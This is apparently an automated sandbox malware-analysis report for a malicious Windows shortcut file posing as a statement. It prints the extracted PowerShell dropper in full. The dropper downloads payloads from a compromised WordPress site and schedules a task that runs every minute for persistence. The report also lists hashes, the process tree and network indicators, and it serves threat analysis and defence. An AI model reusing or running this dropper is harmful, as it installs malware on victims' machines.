Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

22_11_2024_stmnt.lnk

windows7-x64

10

22_11_2024_stmnt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2024, 11:14 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22_11_2024_stmnt.lnk

  • Size

    3KB

  • MD5

    ef8150f41db3c25684ff13470182898f

  • SHA1

    6a10b98d8cd2fb0fa641d282ea30fc196638b8cd

  • SHA256

    e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b

  • SHA512

    d7937781c09595c1b0c4a058929579a7499b7e28c67ef48f3ab6704a4c3b2b80cea38a1452f275e0b1205ddbabeeceaadf3c3fcd84be8fb6270904859eeff6c3

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
1
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2088

Network

  • flag-us
    DNS
    www.italialife24.it
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    www.italialife24.it
    IN A
    Response
    www.italialife24.it
    IN CNAME
    italialife24.it
    italialife24.it
    IN A
    46.254.34.201
  • 46.254.34.201:443
    www.italialife24.it
    tls
    powershell.exe
    353 B
     219 B
     5
    5
  • 46.254.34.201:443
    www.italialife24.it
    tls
    powershell.exe
    353 B
     219 B
     5
    5
  • 46.254.34.201:443
    www.italialife24.it
    tls
    powershell.exe
    353 B
     219 B
     5
    5
  • 46.254.34.201:443
    www.italialife24.it
    tls
    powershell.exe
    353 B
     219 B
     5
    5
  • 8.8.8.8:53
    www.italialife24.it
    dns
    powershell.exe
    65 B
     95 B
     1
    1

    DNS Request

    www.italialife24.it

    DNS Response

    46.254.34.201

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2088-38-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2088-39-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2088-41-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-42-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-40-0x0000000002660000-0x0000000002668000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2088-44-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-43-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-45-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-46-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2088-47-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

    Filesize

    9.6MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.